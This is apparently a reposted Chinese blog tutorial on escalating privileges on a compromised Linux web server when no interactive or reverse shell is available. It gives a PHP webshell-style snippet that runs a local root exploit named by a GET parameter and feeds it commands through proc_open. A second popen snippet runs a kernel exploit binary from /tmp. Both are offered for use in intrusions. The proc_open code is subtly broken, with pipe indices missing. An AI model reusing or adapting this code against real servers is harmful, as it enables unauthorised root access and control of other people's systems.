Linux下非交互式提权详解
<p><span><strong>前言</strong></span></p>
<p>
之前拿到某站的Webshell之后,在提权的时候发现网站不能反弹shell。而且,在渗透的时候经常遇到那种不能反弹shell的,你的提权工具拿上去之后因为没有交互式的环境,也不知道提权是否成功。因此,写了一个简单的工具。需要的朋友们可以参考学习。</p>
<p>
<span><strong>方法如下</strong></span></p>
<p>
<strong>proce_open()</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterplain" id="highlighter_845768">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="plain plain">// path是提权工具的绝对路径,例如:/usr/local/htdocs/2.6.18</code>
</div>
<div class="line number2 index1 alt1">
<code class="plain plain">// cmd是你需要执行的命令,例如:whoami</code>
</div>
<div class="line number3 index2 alt2">
<code class="plain plain">if(isset($_GET['path']) && isset($_GET['cmd'])){</code>
</div>
<div class="line number4 index3 alt1">
<code class="plain spaces"> </code><code class="plain plain">$path = $_GET['path'];</code>
</div>
<div class="line number5 index4 alt2">
<code class="plain spaces"> </code><code class="plain plain">$cmd = $_GET['cmd'];</code>
</div>
<div class="line number6 index5 alt1">
<code class="plain spaces"> </code><code class="plain plain">$descriptorspec = array(</code>
</div>
<div class="line number7 index6 alt2">
<code class="plain spaces"> </code><code class="plain plain">0 => array("pipe", "r"),</code>
</div>
<div class="line number8 index7 alt1">
<code class="plain spaces"> </code><code class="plain plain">1 => array("pipe", "w"),</code>
</div>
<div class="line number9 index8 alt2">
<code class="plain spaces"> </code><code class="plain plain">2 => array("pipe", "w")</code>
</div>
<div class="line number10 index9 alt1">
<code class="plain spaces"> </code><code class="plain plain">);</code>
</div>
<div class="line number11 index10 alt2">
<code class="plain spaces"> </code><code class="plain plain">$process = proc_open($path, $descriptorspec, $pipes);</code>
</div>
<div class="line number12 index11 alt1">
<code class="plain spaces"> </code>
</div>
<div class="line number13 index12 alt2">
<code class="plain spaces"> </code><code class="plain plain">if (is_resource($process)) {</code>
</div>
<div class="line number14 index13 alt1">
<code class="plain spaces"> </code><code class="plain plain">fwrite($pipes,$cmd);</code>
</div>
<div class="line number15 index14 alt2">
<code class="plain spaces"> </code><code class="plain plain">fclose($pipes);</code>
</div>
<div class="line number16 index15 alt1">
<code class="plain spaces"> </code><code class="plain plain">echo stream_get_contents($pipes);</code>
</div>
<div class="line number17 index16 alt2">
<code class="plain spaces"> </code><code class="plain plain">echo stream_get_contents($pipes);</code>
</div>
<div class="line number18 index17 alt1">
<code class="plain spaces"> </code><code class="plain plain">fclose($pipes);</code>
</div>
<div class="line number19 index18 alt2">
<code class="plain spaces"> </code><code class="plain plain">fclose($pipes);</code>
</div>
<div class="line number20 index19 alt1">
<code class="plain spaces"> </code><code class="plain plain">$return_value = proc_close($process);</code>
</div>
<div class="line number21 index20 alt2">
<code class="plain spaces"> </code><code class="plain plain">} </code>
</div>
<div class="line number22 index21 alt1">
<code class="plain plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
代码很简单,不懂的可以看看PHP手册,<code>popen()</code>在这里也可以实现相同的效果</p>
<p>
另外,有了这个代码之后,我们以后提权是不是就可以直接把提权工具扔到服务器上面,然后PHP代码改一改,循环测试哪些提权工具是可用的了。</p>
<p>
<strong>popen()</strong></p>
<p>
这是土司之前一个人发的,代码原封不动的放在了下面。稍微改一改就能达到上面一样的效果</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterplain" id="highlighter_272093">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="plain plain">$sucommand = "/tmp/2.6.18-2011";</code>
</div>
<div class="line number2 index1 alt1">
<code class="plain plain">$fp = popen($sucommand ,"w");</code>
</div>
<div class="line number3 index2 alt2">
<code class="plain plain">fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111");</code>
</div>
<div class="line number4 index3 alt1">
<code class="plain plain">pclose($fp);</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>总结</strong></span></p>
<p>
以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流,谢谢大家对的支持。</p>
<p>
原文链接:http://ecma.io/?p=611</p>
頁:
[1]